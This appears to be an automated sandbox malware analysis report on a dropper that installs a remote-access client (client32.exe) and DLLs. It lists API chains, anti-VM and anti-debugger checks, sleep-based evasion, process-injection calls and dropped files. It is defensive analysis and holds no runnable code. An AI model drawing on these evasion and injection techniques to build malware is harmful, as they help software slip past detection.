Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_11157150
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	4_2_11025180
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	4_2_11157550
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_110255D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1110F720 IsIconic,GetTickCount,	4_2_1110F720
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_1111F990
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_1111F990
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	4_2_110238A0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	4_2_110BFC50
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_11023F80
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	4_2_11110340
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CA260
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CA260
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_11157150
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_11157150
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_11025180
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_11157550
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110255D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1110F720 IsIconic,GetTickCount,	6_2_1110F720
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_1111F990
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_1111F990
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_110238A0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110BFC50
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11023F80
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11110340
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CA260
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CA260
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	6_2_111365D0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

4_2_11029200

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C91F0		4_2_6C3C91F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3D4F30		4_2_6C3D4F30

Delayed program exit found

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110B7290 Sleep,ExitProcess,		4_2_110B7290
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110B7290 Sleep,ExitProcess,		6_2_110B7290

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_0-10528
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_0-10528

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,

4_2_6C3D7F80

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Window / User API: threadDelayed 2215			Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Window / User API: threadDelayed 7416			Jump to behavior

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msauserext.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\neth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\netmsg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscat32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\DNScache\remcmdstub.exe	Jump to dropped file

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Evaded block: after key decision	graph_0-10664
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-126243
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-126298
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-126648
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-129871
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-130270
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision	graph_4-130515
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_4-130010

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-10670
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_4-126598

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API coverage: 5.5 %
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API coverage: 2.6 %

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_6C3D4F30

4_2_6C3D4F30

Source: C:\Users\user\AppData\Local\DNScache\client32.exe TID: 5720	Thread sleep time: -553750s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe TID: 5720	Thread sleep time: -1854000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_6C3D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C3D3226h

4_2_6C3D3130

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_0019F905 FindFirstFileExW,	0_2_0019F905
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D1B3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_11069760
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	4_2_11123690
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	4_2_11108090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	4_2_110BC0E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102CE84
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	4_2_11064EF0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C65EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6C65EFE1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C660F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6C660F84
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C65CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	4_2_6C65CA9B
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C660B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6C660B33
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C65C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	4_2_6C65C775
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C660702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6C660702
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102CD90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_11069760
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_11123690
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11108090 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_11108090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	6_2_110BC0E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11064EF0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_6C686C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

4_2_6C686C74

Source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla@l*
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B19000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E32000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4573686674.000000000046E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.2559464023.0000000004E32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: client32.exe, 00000004.00000003.2559464023.0000000004E1D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW!
Source: client32.exe, 00000006.00000002.2268966471.0000000000522000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2268650559.000000000051F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	API call chain: ExitProcess graph end node	graph_0-10711
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node	graph_4-124719
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node	graph_4-124217
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_00197884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00197884

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

4_2_110CF9F0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_6C686C74 VirtualProtect ?,-00000001,00000104,?

4_2_6C686C74

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

4_2_11029200

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_00191000 lstrcmpA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,

0_2_00191000

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00197884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00197884
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_0019D978 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0019D978
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00197A11 SetUnhandledExceptionFilter,	0_2_00197A11
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00196F73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00196F73
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	4_2_11092090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_1115E3E1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_1116A469
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,	4_2_11030A50
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C3E28E1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3E87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C3E87F5
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C68ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	4_2_6C68ADFC
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C610807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6C610807
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C68C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6C68C16F
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_11092090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1115E3E1
